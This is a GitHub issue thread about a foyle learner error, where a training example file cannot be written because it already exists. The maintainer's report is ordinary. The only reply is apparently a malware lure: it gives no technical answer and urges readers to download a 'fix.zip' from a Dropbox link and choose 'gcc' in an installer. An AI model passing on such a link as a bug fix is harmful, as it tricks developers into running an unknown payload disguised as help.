### ISSUE TITLE
Learner Reconcile Error - Can't write example because it already exists

### ISSUE THREAD

**Issue by jlewi** [jlewi/foyle#205]
I'm getting errors like the following

```
Can't write /Users/jlewi/.foyle/training/01J6631Y5MK6E0R1ZSW33YVPBJ.example.binpb; It already exists
```

The error gets added here
https://github.com/jlewi/foyle/blob/cd82cc514bbc68dda579e4420130e7e22cd38a4d/app/pkg/learn/learner.go#L203

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
